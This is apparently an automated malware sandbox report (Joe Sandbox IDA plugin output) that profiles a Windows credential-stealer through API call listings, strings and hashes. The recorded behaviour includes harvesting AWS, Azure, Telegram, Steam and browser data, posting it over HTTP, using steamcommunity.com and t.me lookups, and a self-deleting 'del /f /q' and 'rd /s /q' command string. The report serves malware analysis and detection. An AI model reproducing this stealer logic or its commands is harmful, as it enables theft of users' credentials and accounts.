                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C11B271340310BBE7206B60EC4AF5BBAAAEB84B56F10402AF345E71E1C6B45C80CB99
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 004166BC
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00000000,?,00000028), ref: 004166DE
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,\.azure\), ref: 004166ED
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 00416330: wsprintfA.USER32 ref: 00415DBE
                                                                                                                                                                                                                                                                                  • Part of subcall function 00416330: FindFirstFileA.KERNEL32(?,?), ref: 00415DCF
                                                                                                                                                                                                                                                                                  • Part of subcall function 00416330: strlen.MSVCRT ref: 00415F1C
                                                                                                                                                                                                                                                                                  • Part of subcall function 00416330: memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00415F5B
                                                                                                                                                                                                                                                                                  • Part of subcall function 00416330: strlen.MSVCRT ref: 00415FC7
                                                                                                                                                                                                                                                                                  • Part of subcall function 00416330: memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 00416004
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00416772
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00000000,?,00000028), ref: 00416794
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,\.aws\), ref: 004167A3
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00416828
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00000000,?,0000001C), ref: 0041684A
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00416859
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcat$memset$memcmpstrlen$FileFindFirstFolderPathlstrcpywsprintf
                                                                                                                                                                                                                                                                                • String ID: JB$\.IdentityService\$\.aws\$\.azure\
                                                                                                                                                                                                                                                                                • API String ID: 3008122021-3834632163
                                                                                                                                                                                                                                                                                • Opcode ID: a98f44546dc83d83092c0b59d743b05ef3ed3a32d71f5366ac4852f18bdd0379
                                                                                                                                                                                                                                                                                • Instruction ID: 9794ee9d7d5702d65981f79f32deebafb897a1fd212e6a52f5b9a62acbb35f13
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a98f44546dc83d83092c0b59d743b05ef3ed3a32d71f5366ac4852f18bdd0379
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF61BF71900748A7DB00EF75D9C69E97368BF98308F40925AFD056A143EB78EAC9C7D4
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                  • Part of subcall function 004108B0: GetProcessHeap.KERNEL32(00000000,?,00401148,?,00420C50), ref: 004108B2
                                                                                                                                                                                                                                                                                  • Part of subcall function 004108B0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401148,?,00420C50), ref: 004108C0
                                                                                                                                                                                                                                                                                  • Part of subcall function 004108B0: GetUserNameA.ADVAPI32(00000000), ref: 004108D3
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,?,?,00000000,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 004172E5
                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00418606), ref: 004172EC
                                                                                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00418606), ref: 0041730C
                                                                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 004175AD
                                                                                                                                                                                                                                                                                • InternetOpenA.WININET ref: 00417682
                                                                                                                                                                                                                                                                                • InternetOpenA.WININET ref: 004176A6
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410540: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0041055C
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410540: GetVolumeInformationA.KERNEL32 ref: 004105AE
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410540: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0041060D
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410540: HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 0041061B
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410540: wsprintfA.USER32 ref: 00410652
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410540: lstrcatA.KERNEL32(00000000,00421178), ref: 00410661
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410540: lstrlenA.KERNEL32(00000000,?), ref: 00410687
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402AA0: InternetOpenA.WININET(?,?,?,?,?), ref: 00402B3A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402AA0: StrCmpCA.SHLWAPI(?,https,?,?,?,?,?), ref: 00402B49
                                                                                                                                                                                                                                                                                  • Part of subcall function 004132F0: StrCmpCA.SHLWAPI(00000000,block), ref: 00413315
                                                                                                                                                                                                                                                                                  • Part of subcall function 004132F0: ExitProcess.KERNEL32 ref: 0041331D
                                                                                                                                                                                                                                                                                  • Part of subcall function 00403920: InternetOpenA.WININET(?,?,?,?,?), ref: 004039B9
                                                                                                                                                                                                                                                                                  • Part of subcall function 00403920: StrCmpCA.SHLWAPI(?,https,?,?,?,?,?), ref: 004039C8
                                                                                                                                                                                                                                                                                  • Part of subcall function 00412C40: strtok_s.MSVCRT ref: 00412C64
                                                                                                                                                                                                                                                                                  • Part of subcall function 00412C40: strtok_s.MSVCRT ref: 00412CA9
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040E440: StrCmpCA.SHLWAPI(00000000,chrome), ref: 0040E4B3
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,?,?,?,?), ref: 00417C10
                                                                                                                                                                                                                                                                                  • Part of subcall function 00403920: InternetConnectA.WININET ref: 00403B08
                                                                                                                                                                                                                                                                                  • Part of subcall function 00403920: HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 00403B4B
                                                                                                                                                                                                                                                                                  • Part of subcall function 00403920: InternetSetOptionA.WININET(?,0000001F,00010300,00000004), ref: 00403B75
                                                                                                                                                                                                                                                                                  • Part of subcall function 00412E50: strtok_s.MSVCRT ref: 00412E74
                                                                                                                                                                                                                                                                                  • Part of subcall function 00412F60: strtok_s.MSVCRT ref: 00412F88
                                                                                                                                                                                                                                                                                  • Part of subcall function 00416FC0: lstrlenA.KERNEL32(00000000), ref: 00417011
                                                                                                                                                                                                                                                                                  • Part of subcall function 00414FE0: RegOpenKeyExA.KERNEL32(80000001,Software\Valve\Steam,00000000,00020119,?), ref: 0041506F
                                                                                                                                                                                                                                                                                  • Part of subcall function 00414FE0: RegQueryValueExA.ADVAPI32(?,SteamPath,00000000,00000000,?,000000FF), ref: 00415090
                                                                                                                                                                                                                                                                                  • Part of subcall function 00414FE0: RegCloseKey.ADVAPI32(?), ref: 00415099
                                                                                                                                                                                                                                                                                  • Part of subcall function 00414FE0: lstrcatA.KERNEL32(?,?,?,00000104), ref: 004150B8
                                                                                                                                                                                                                                                                                  • Part of subcall function 00414FE0: lstrcatA.KERNEL32(?,\config\), ref: 004150C4
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                • C:\ProgramData\, xrefs: 0041756F
                                                                                                                                                                                                                                                                                • ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890, xrefs: 00417C0B
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Open$Internet$Heaplstrcatlstrcpylstrlenstrtok_s$Process$AllocCloseCreateDirectoryEvent$ConnectExitHandleHttpInformationNameOptionQueryRequestUserValueVolumeWindowswsprintf
                                                                                                                                                                                                                                                                                • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890$C:\ProgramData\
                                                                                                                                                                                                                                                                                • API String ID: 818183501-1067945926
                                                                                                                                                                                                                                                                                • Opcode ID: 253828e2193622bca8c3790444a1af86ecf04706f1a61c859db2bb880bb83f3a
                                                                                                                                                                                                                                                                                • Instruction ID: d3f20ebcfaa0f86e13ddee9407f56ad69643857b77905c87f50bde3cae6408d9
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 253828e2193622bca8c3790444a1af86ecf04706f1a61c859db2bb880bb83f3a
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43C2A331C10B599BDB11EFB5C9815EEB378BF18308F00964EE85567142EB78BAC9CB94
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,chrome), ref: 0040E4B3
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,firefox), ref: 0040E740
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,opera), ref: 0040E5B9
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040B4E0: StrCmpCA.SHLWAPI(00000000,Opera GX,0042150A,0042150A), ref: 0040B523
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,chrome), ref: 0040E923
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcpy
                                                                                                                                                                                                                                                                                • String ID: Stable\$chrome$firefox$opera
                                                                                                                                                                                                                                                                                • API String ID: 3722407311-3146807071
                                                                                                                                                                                                                                                                                • Opcode ID: 6706b4d3de68381de9acf2f3cf5a3500a8a77dcd0908f9563c4221972a14ca8e
                                                                                                                                                                                                                                                                                • Instruction ID: 22bc5863ea798df5109445d1e364a8a74c8a3d857c00c7bd5e27f083e93039e9
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6706b4d3de68381de9acf2f3cf5a3500a8a77dcd0908f9563c4221972a14ca8e
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 94429131D00B099BDB05EF75C981AEAB7B4FF18308F008159F9556B252EB38BAD5CB94
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0041055C
                                                                                                                                                                                                                                                                                • GetVolumeInformationA.KERNEL32 ref: 004105AE
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0041060D
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 0041061B
                                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00410652
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,00421178), ref: 00410661
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?), ref: 00410687
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcatlstrcpylstrlenwsprintf
                                                                                                                                                                                                                                                                                • String ID: %08lX%04lX%lu$:\$C
                                                                                                                                                                                                                                                                                • API String ID: 1059865016-545181305
                                                                                                                                                                                                                                                                                • Opcode ID: 90bb885e6cb9c3f254673d7949eac57a71e00247e07ca877e6107e12700a4b67
                                                                                                                                                                                                                                                                                • Instruction ID: daccc5cf811b00eb36f485bb9bb5cfb034b4705064687d02f987ca2459062bbc
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 90bb885e6cb9c3f254673d7949eac57a71e00247e07ca877e6107e12700a4b67
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6141D4705083107BD301BB718C85BBF7AE99FC5784F00491EF58597291EBBC99829BAA
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0041841D
                                                                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00418444
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 0041854E
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00418573
                                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00418584
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcpy$memset$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                                                                                                                                                                                                                                                • String ID: " & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$<
                                                                                                                                                                                                                                                                                • API String ID: 86853776-1686486140
                                                                                                                                                                                                                                                                                • Opcode ID: cf68e5ffe9d5c94084dc0a4ed0001313601785bbf26bd63883070f90d5ca4861
                                                                                                                                                                                                                                                                                • Instruction ID: 7bf5b1220a567134bc8680c304d03b75e5346a68b302ecb6bd04b7556a355826
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf68e5ffe9d5c94084dc0a4ed0001313601785bbf26bd63883070f90d5ca4861
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3431B130B043446BE200AB6298D67BF77A69BD574CF00451EF4451A282DFBC6DC98B9B
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(?,ChromeBuildTools,00000104), ref: 00407130
                                                                                                                                                                                                                                                                                • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00407142
                                                                                                                                                                                                                                                                                • CreateDesktopA.USER32 ref: 00407166
                                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(?,00000000,?,OCALAPPDATA,00000000,?,0000001C), ref: 004071BD
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 00407222
                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8,00000000,00000000,?,00000000,?), ref: 0040725B
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Desktop$CreateOpenSleeplstrcpymemcpystrlen
                                                                                                                                                                                                                                                                                • String ID: %s%s"$ChromeBuildTools$D$OCALAPPDATA
                                                                                                                                                                                                                                                                                • API String ID: 3603158527-2020731023
                                                                                                                                                                                                                                                                                • Opcode ID: f957c9f241f1788a6717240c2f5f4c9f278a5156d0a920e059212db3f08382fb
                                                                                                                                                                                                                                                                                • Instruction ID: f2f5d87aafaa2d86ed8620da2dc3468a3bb05fc034b5e9ecb920fc18406a804c
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f957c9f241f1788a6717240c2f5f4c9f278a5156d0a920e059212db3f08382fb
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56313771D04344ABDB21EB218D41BEFB774AF95304F00419EF90832192DB786AC5CBAA
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,Software\Valve\Steam,00000000,00020119,?), ref: 0041506F
                                                                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,SteamPath,00000000,00000000,?,000000FF), ref: 00415090
                                                                                                                                                                                                                                                                                  • Part of subcall function 00414BD0: wsprintfA.USER32 ref: 00414BEE
                                                                                                                                                                                                                                                                                  • Part of subcall function 00414BD0: FindFirstFileA.KERNEL32(?,?), ref: 00414BFF
                                                                                                                                                                                                                                                                                  • Part of subcall function 00414BD0: strlen.MSVCRT ref: 00414CA9
                                                                                                                                                                                                                                                                                  • Part of subcall function 00414BD0: memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00414CEB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00414BD0: strlen.MSVCRT ref: 00414D57
                                                                                                                                                                                                                                                                                  • Part of subcall function 00414BD0: memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 00414D94
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00415099
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,?,?,00000104), ref: 004150B8
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,\config\), ref: 004150C4
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcatmemcmpstrlen$CloseFileFindFirstOpenQueryValuelstrcpywsprintf
                                                                                                                                                                                                                                                                                • String ID: Software\Valve\Steam$SteamPath$\config\
                                                                                                                                                                                                                                                                                • API String ID: 393122709-2561568711
                                                                                                                                                                                                                                                                                • Opcode ID: 5586b393047b28cf48fe9dec46dc0ec11d4a7ee0403769a6eb676b6b1167209c
                                                                                                                                                                                                                                                                                • Instruction ID: 85194e8d5805dad303305febaf6046d54008d8169596ab7e5b376dc9a1cdcd29
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5586b393047b28cf48fe9dec46dc0ec11d4a7ee0403769a6eb676b6b1167209c
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AAC17131C107489ADB01EF64C9C15FA73B8AF6D318F019289FD496A017EB78BAD4CB94
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00000000,?,0000001A,?,00000104), ref: 00416367
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,\Telegram Desktop\), ref: 00416376
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 00416330: wsprintfA.USER32 ref: 00415DBE
                                                                                                                                                                                                                                                                                  • Part of subcall function 00416330: FindFirstFileA.KERNEL32(?,?), ref: 00415DCF
                                                                                                                                                                                                                                                                                  • Part of subcall function 00416330: strlen.MSVCRT ref: 00415F1C
                                                                                                                                                                                                                                                                                  • Part of subcall function 00416330: memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00415F5B
                                                                                                                                                                                                                                                                                  • Part of subcall function 00416330: strlen.MSVCRT ref: 00415FC7
                                                                                                                                                                                                                                                                                  • Part of subcall function 00416330: memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 00416004
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcatmemcmpstrlen$FileFindFirstFolderPathlstrcpywsprintf
                                                                                                                                                                                                                                                                                • String ID: %s\%s$%s\*$C:\ProgramData\$Soft$\Telegram Desktop\
                                                                                                                                                                                                                                                                                • API String ID: 2540414856-1297282028
                                                                                                                                                                                                                                                                                • Opcode ID: 48fb6209651f6f965a5a0533c29178d570c3f552c85b2c53c6e43cdd25c8a249
                                                                                                                                                                                                                                                                                • Instruction ID: 64e18173e81040c63563a2c948d1254a8cd49f8bd4ee544822172e8b9e7dfe6d
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 48fb6209651f6f965a5a0533c29178d570c3f552c85b2c53c6e43cdd25c8a249
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09B19571810B4EA7DB00EF75C9858D9B768BF69308F40924AFD0952502EB78F6E8CBD4
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 00410B42
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00410B50
                                                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?), ref: 00410B68
                                                                                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,ProcessorNameString,00000000,00000000,00000000,000000FF), ref: 00410B85
                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00410B8E
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                • ProcessorNameString, xrefs: 00410B7C
                                                                                                                                                                                                                                                                                • HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 00410B5E
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString
                                                                                                                                                                                                                                                                                • API String ID: 3466090806-2804670039
                                                                                                                                                                                                                                                                                • Opcode ID: ad177650e976e3d35c7c3a9112606bb10243cc343026616705170833e325d11c
                                                                                                                                                                                                                                                                                • Instruction ID: 414338a11f3689f75f6fdb63b0f136fa5a8568cc8c95f28b9b39ab38a5685d7b
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad177650e976e3d35c7c3a9112606bb10243cc343026616705170833e325d11c
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04F08230784320BBD3106B24AC0AF5A7A99AB45B51F504029F685A71E1D6A06C508BD5
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410240: lstrlenA.KERNEL32(?,?,?,00417367,0042150A,0042150A,?,?,?,?,00418606), ref: 00410249
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410240: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,?,00418606), ref: 0041027A
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?,00000000,0042150A,0042150A), ref: 00416C6A
                                                                                                                                                                                                                                                                                • strstr.MSVCRT ref: 00416C82
                                                                                                                                                                                                                                                                                • strstr.MSVCRT ref: 00416C94
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000EA60,?,0042150A,00000000,0042150A,0042150A), ref: 00416DC7
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcpylstrlenstrstr$Sleep
                                                                                                                                                                                                                                                                                • String ID: ERROR$steamcommunity.com$t.me
                                                                                                                                                                                                                                                                                • API String ID: 1105026832-5696879
                                                                                                                                                                                                                                                                                • Opcode ID: cfbe53031ad5f4abf68ac17c1e9529c3c811d18bb84b897b5de7f13dc1821656
                                                                                                                                                                                                                                                                                • Instruction ID: d2cef3e00896b903973622f9bff644efbf55bb675c2f2304de14bb25205f25c7
